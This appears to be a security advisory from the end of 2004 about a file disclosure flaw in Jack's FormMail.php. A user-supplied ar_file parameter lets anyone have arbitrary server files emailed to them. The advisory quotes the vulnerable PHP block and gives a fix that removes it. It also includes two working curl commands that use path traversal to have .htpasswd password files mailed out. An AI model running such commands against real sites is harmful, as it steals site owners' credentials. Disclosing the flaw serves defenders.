Security Advisory Vendor: Jack (Jack's Scripts) Date: 31-Dec-2004 Script: FormMail.php Site: http://dtheatre.com/scripts/formmail.php Type: Remote Severity: High Version: 5.0 (maybe others) Script Overview: Jacks FormMail.php script is a simple PHP script that allows web site owners to easily email form values to themselves without much work or scripting knowledge. Problem: The script currently accepts an auto-reply variable (ar_file) that specifies a filepath to send to the person submitting the form. The problem is that this variable can be defined by the person submitting the form and can be used to have arbitrary server files sent to that person. I found this vulnerability because someone used the attack against a customer of mine. Because this is being used in the wild, I'm posting immediately to BUGTRAQ without waiting for Jack to fix the script. Solution: Remove the following code from the FormMail.php script. ------------------------------------------------------ if (file_exists($ar_file)) { $fd = fopen($ar_file, "rb"); $ar_message = fread($fd, filesize($ar_file)); fclose($fd); mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE: Form Submission", ($ar_from)?$ar_from:$recipient, $email); } ------------------------------------------------------ Example Attack: Assume the following Script Location : http://yoursite.com/cgi-bin/formmail.php Password File Location : http://yoursite.com/members/.htpasswd Use the following curl command to have the password file emailed to you. # curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php Depending on permission settings, the .htpasswd could be compromised, even if it is outside of the html folder as in the following example. # curl -e http://yoursite.com/ -d ar_file=../../.htpasswd -d email=you@yoursite.com http://yoursite.com/cgi-bin/formmail.php